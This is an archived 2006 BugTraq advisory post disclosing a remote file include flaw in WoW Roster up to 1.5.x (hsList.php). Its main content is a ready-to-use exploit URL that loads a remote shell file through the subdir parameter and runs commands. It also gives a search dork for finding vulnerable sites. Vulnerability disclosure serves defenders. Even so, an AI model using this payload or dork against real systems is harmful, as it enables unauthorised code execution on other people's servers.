BugTraq
WoW Roster <= 1.5.x Remote File Include (hsList.php) Aug 01 2006 03:22PM
AG Spider (ag-spider hotmail com)
Title : WoW Roster <= 1.5.x Remote File Include (hsList.php)

########################################################################
#######

Discovered By :::: AG-Spider

------------------------------------------------------------------------
-----
Class : Remote file include
Rish : Danger
------------------------------------------------------------------------
-----

dork : "wow roster version 1.5"

Exploit :
http://www.site.com/[wow_roster_path]/hsList.php?subdir=http://[Shellc0d
e]]/cmd.txt?&cmd=ls

------------------------------------------------------------------------
----

greetz4: [ Black-Code - KILLERxXx - KaBaRa.HaCk .eGy]

c0natct us : AG-Spider [ at ] HoTMail.CoM
thx 2 :::::: Lezr.com & 3asfh.net

_________________________________________________________________
The new MSN Search Toolbar now includes Desktop search!
http://join.msn.com/toolbar/overview

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus